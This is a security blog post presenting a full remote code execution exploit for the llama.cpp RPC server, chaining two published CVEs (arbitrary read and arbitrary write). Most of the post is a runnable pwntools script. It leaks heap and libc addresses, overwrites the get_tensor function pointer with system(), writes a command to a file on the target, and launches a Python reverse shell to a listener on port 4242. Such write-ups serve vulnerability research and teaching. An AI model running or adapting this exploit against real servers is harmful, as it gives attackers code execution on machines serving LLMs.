Pwning LLaMA.cpp RPC Server

 Date: October 3, 2024

Hello world, and Shana Tova :D

I spent the last few days developing an RCE exploit that leverages CVE-2024-42478 (arbitrary read) and CVE-2024-42479 (arbitrary write).

Note: For a more detailed version of the exploit-dev process, see https://youtu.be/OJs1-zm0AqU

The bugs

The bugs are well documented in the GitHub advisories GHSA-5vm9-p64x-gqw9 and GHSA-wcr5-566p-9cwj. They are pretty trivial, but fun to exploit :D

Achieving RCE

To achieve RCE, I overwrote one of the callbacks in ggml_backend_buffer::iface:

    // Table of function pointers that a backend buffer dispatches through.
    // Assuming 8-byte function pointers and no padding, the slots sit at
    // consecutive multiples of 8: get_name +0x00, free_buffer +0x08,
    // get_base +0x10, init_tensor +0x18, set_tensor +0x20, get_tensor +0x28,
    // cpy_tensor +0x30, clear +0x38, reset +0x40.
    struct ggml_backend_buffer_i {
        const char * (*GGML_CALL get_name)   (ggml_backend_buffer_t buffer);
        void         (*GGML_CALL free_buffer)(ggml_backend_buffer_t buffer);
        void *       (*GGML_CALL get_base)   (ggml_backend_buffer_t buffer);
        void         (*GGML_CALL init_tensor)(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor);
        void         (*GGML_CALL set_tensor) (ggml_backend_buffer_t buffer,       struct ggml_tensor * tensor, const void * data, size_t offset, size_t size);
        void         (*GGML_CALL get_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * tensor,       void * data, size_t offset, size_t size);
        bool         (*GGML_CALL cpy_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * src, struct ggml_tensor * dst); // dst is in the buffer, src may be in any buffer
        void         (*GGML_CALL clear)      (ggml_backend_buffer_t buffer, uint8_t value);
        void         (*GGML_CALL reset)      (ggml_backend_buffer_t buffer); // reset any internal state due to tensor initialization, such as tensor extras
    };

    // A backend buffer object. The callback table is embedded by value as the
    // first member, so it begins at offset 0 of the object.
    struct ggml_backend_buffer {
        struct ggml_backend_buffer_i  iface;   // callback table (first member)
        ggml_backend_buffer_type_t    buft;
        ggml_backend_buffer_context_t context;
        size_t size;
        enum ggml_backend_buffer_usage usage;
    };

The get_tensor callback is invoked every time the client sends a GET_TENSOR command:

b3560/ggml/src/ggml-backend.c#L246:

// Copies `size` bytes starting at `offset` out of `tensor` into `data` by
// delegating to the owning buffer's get_tensor callback.
GGML_CALL void ggml_backend_tensor_get(const struct ggml_tensor * tensor, void * data, size_t offset, size_t size) {
    // A view tensor uses the buffer of the tensor it is a view of.
    ggml_backend_buffer_t buf = tensor->view_src ? tensor->view_src->buffer : tensor->buffer;

    GGML_ASSERT(buf != NULL && "tensor buffer not set");
    GGML_ASSERT(tensor->data != NULL && "tensor not allocated");
    GGML_ASSERT(offset + size <= ggml_nbytes(tensor) && "tensor read out of bounds");

    // Nothing to copy for a zero-length request; the callback is not reached.
    if (!size) {
        return;
    }

    // Indirect call through the buffer's callback table; `buf` itself is
    // passed as the first argument.
    buf->iface.get_tensor(buf, tensor, data, offset, size); // <---- here
}

exp.py

The full exploit is below:

#!/usr/bin/env python3
from pwn import *
# Host and port passed to remote() when connecting to the RPC server.
IP = 'localhost'
PORT = 50052
# Address and port interpolated into CMD below.
REVERSE_SHELL_IP = '127.0.0.1'
REVERSE_SHELL_PORT = 4242
# Command string handed to exec_cmd() by the __main__ block.
CMD = f'''python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{REVERSE_SHELL_IP}",{REVERSE_SHELL_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' '''


'''
1 byte	|	8 bytes		|    ...
cmd     |	msg size	|  msg data
'''

# Command ids written into the 1-byte `cmd` field of each message by send_cmd().
# Only the three commands this script uses are listed.
ALLOC_BUFFER = 0
SET_TENSOR   = 6
GET_TENSOR   = 7

# utils
def send_cmd(io: remote, cmd: int, buf: bytes):
    """Frame ``buf`` as a single message and send it over ``io``.

    The message consists of a 1-byte command id, an 8-byte payload length,
    and then the payload bytes themselves.

    Args:
        io: Open connection to send on.
        cmd: Command id for the 1-byte ``cmd`` field.
        buf: Payload bytes; their length fills the 8-byte size field.
    """
    header = p8(cmd) + p64(len(buf))
    io.send(header + buf)

def alloc_buf(io: remote, size: int) -> int:
    """Issue an ALLOC_BUFFER request and return a value from the reply.

    Args:
        io: Open connection to the RPC server.
        size: Requested size, sent as the 8-byte message payload.

    Returns:
        Bytes 0x8..0x10 of the reply unpacked with ``u64``. The rest of the
        script treats this value as a heap address on the server.
    """
    send_cmd(io, ALLOC_BUFFER, p64(size))
    reply = io.recv(1024)
    return u64(reply[0x8:0x10])

def arb_read(io: remote, target_addr: int, valid_addr: int) -> int:
    """Send a crafted GET_TENSOR request aimed at ``target_addr``.

    The 64-bit target is split across two fields of the request: its upper
    32 bits are written at message offset 0xe0 and its lower 32 bits go into
    the trailing ``offset`` field.

    Args:
        io: Open connection to the RPC server.
        target_addr: Address the request is aimed at.
        valid_addr: Value stored in the tensor's ``buffer`` field. Every
            caller in this script passes the value returned by ``alloc_buf``.

    Returns:
        Bytes 0x8..0x10 of the reply, unpacked with ``u64``.
    """
    # sizeof msg = 0x138    ->     ( sizeof(rpc_tensor) + 2*sizeof(uint64_t) )
    # serialization format: | rpc_tensor | offset (8 bytes) | size (8 bytes) |
    tensor = flat( {
        0x8:   p32(28), # type (hard-coded value; its meaning is not shown in this file)
        12:    p64(valid_addr), # buffer
        0x18:    p32(0x41414141)*8, # 32 bytes of 'A' filler
        0xe0:  p32(target_addr >> 32), # data remote ptr -- presumably the upper half of the 64-bit `data` field; TODO confirm

        0x128: p64(target_addr & 0x00000000ffffffff), # offset (low 32 bits of the target)
        0x130: p64(0x130) # size
    }, filler = b'\x00', length=0x138)

    send_cmd(io, GET_TENSOR, tensor)
    resp = io.recv(1024)
    # Skip the first 8 bytes of the reply (presumably a length prefix) and
    # decode the next 8 as the value read.
    return u64(resp[0x8:0x10])

def arb_write(io: remote, target_addr: int, valid_addr: int, what: bytes) -> int:
    """Send a crafted SET_TENSOR request aimed at ``target_addr``.

    Uses the same field layout as ``arb_read``, except that the bytes to
    store follow the ``offset`` field instead of a size. The message is fixed
    at 0x140 bytes with the payload placed at 0x130, which leaves 0x10 bytes
    for ``what``.

    Args:
        io: Open connection to the RPC server.
        target_addr: Address the request is aimed at.
        valid_addr: Value stored in the tensor's ``buffer`` field.
        what: Payload bytes placed at message offset 0x130.

    Returns:
        Always 0; no reply is read from the connection.
    """
    # serialization format: | rpc_tensor | offset (8 bytes) | data (size bytes) |
    tensor = flat( {
        0x8:   p32(28), # type (hard-coded value; its meaning is not shown in this file)
        12:    p64(valid_addr), # buffer
        0x18:    p32(0x41414141)*8, # 32 bytes of 'A' filler
        0xe0:  p32(target_addr >> 32), # data remote ptr -- presumably the upper half of the 64-bit `data` field; TODO confirm

        0x128: p64(target_addr & 0x00000000ffffffff), # offset (low 32 bits of the target)
        0x130: what  # payload
    }, filler = b'\x00', length=0x140)

    send_cmd(io, SET_TENSOR, tensor)
    # resp = io.recv(1024)
    return 0

def trigger_plt() -> None:
    """Open a throwaway connection, request one buffer, and disconnect.

    The caller runs this before the main connection; its comment there says
    the purpose is to make sure the ``puts`` address has been resolved.
    """
    warmup = remote(IP, PORT)
    alloc_buf(warmup, 0x140)
    warmup.close()

def exec_cmd(io: remote, cmd: str) -> None:
    """Stage ``cmd`` into a file named ``x`` one character at a time, then run it.

    Every step repeats the same three calls: write a short NUL-terminated
    shell string at ``heap_leak``, write ``libc_system`` at ``heap_leak+0x28``,
    then issue a GET_TENSOR request via ``arb_read``. The callback invoked for
    GET_TENSOR receives the buffer pointer as its first argument (see
    ggml_backend_tensor_get quoted earlier in the post).

    Reads the module-level names ``heap_leak`` and ``libc_system``, which the
    ``__main__`` block assigns before calling this function.

    Args:
        io: Open connection to the RPC server.
        cmd: Command text to stage; only double quotes are escaped.
    """
    with log.progress('Executing command') as p:
        # clear file
        arb_write(io, heap_leak, heap_leak, f'echo "">x\x00'.encode())
        arb_write(io, heap_leak+0x28, heap_leak, p64(libc_system)) # +0x28 is the get_tensor slot of the iface table (6th pointer, assuming 8-byte pointers)
        arb_read(io, 0xdeadbeefcafebabe, heap_leak) # call get_tensor to trigger the `jmp rax`

        # write chars
        # One character per request: the longest string built here
        # (`echo -n "\"">>x` plus the NUL) is 16 bytes, which matches the
        # 0x10-byte payload window of arb_write.
        for c in cmd:
            p.status(f'Writing {c}')
            if c == '"':
                c = '\\"'
            arb_write(io, heap_leak, heap_leak, f'echo -n "{c}">>x\x00'.encode())
            arb_write(io, heap_leak+0x28, heap_leak, p64(libc_system)) # +0x28 is the get_tensor slot of the iface table (6th pointer, assuming 8-byte pointers)
            arb_read(io, 0xdeadbeefcafebabe, heap_leak) # call get_tensor to trigger the `jmp rax`

        # exec command
        arb_write(io, heap_leak, heap_leak, b'sh ./x\x00')
        arb_write(io, heap_leak+0x28, heap_leak, p64(libc_system))
        arb_read(io, 0xdeadbeefcafebabe, heap_leak)
    return None

if __name__ == '__main__':
    # Script entry point: leak a heap address, derive library base addresses
    # from it, then call exec_cmd() with CMD. heap_leak and libc_system are
    # assigned at module scope here because exec_cmd() reads them as globals.
    trigger_plt() # make sure the puts addr is getting resolved
    io = remote(IP, PORT)
    heap_leak = alloc_buf(io, 0x140)
    log.info(f'heap_leak = {hex(heap_leak)}')

    # heap_leak+0x20 is the set_tensor slot of the iface table (5th pointer,
    # assuming 8-byte pointers); its value is used to locate libggml.
    set_tensor_addr = arb_read(io, heap_leak+0x20, heap_leak)
    # NOTE(review): 0x776d0 and the three offsets below are hard-coded and
    # presumably specific to the libggml/libc builds the author tested against.
    libggml_base = set_tensor_addr - 0x776d0
    log.info(f'set_tensor_addr = {hex(set_tensor_addr)}')
    log.info(f'libggml_base = {hex(libggml_base)}')

    puts_got_offset = 0x105708
    puts_libc_offset = 0x80e50

    # Read the value stored at libggml_base+puts_got_offset and subtract
    # puts_libc_offset from it to get the libc base.
    libc_got_puts = arb_read(io, libggml_base+puts_got_offset, heap_leak)
    libc_base = libc_got_puts - puts_libc_offset
    libc_system = libc_base + 0x50d70
    log.info(f'libc_got_puts = {hex(libc_got_puts)}')
    log.info(f'libc_base = {hex(libc_base)}')
    log.info(f'libc_system = {hex(libc_system)}')
    
    exec_cmd(io, CMD)
    log.success('If we reached here without exception, we have a reverse shell :^)')
    # import os
    # os.system('nc -lvp 4242')
    # io.interactive()

'''
// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;            0
    uint32_t type;          8
    uint64_t buffer;        12
    uint32_t ne[GGML_MAX_DIMS]; 20
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
'''

Output:

solve.gif

 Tags:  llama-cpp pwn CVE-2024-42478 CVE-2024-42479

Previous
⏪ Reverse Engineering a Kernel Driver chall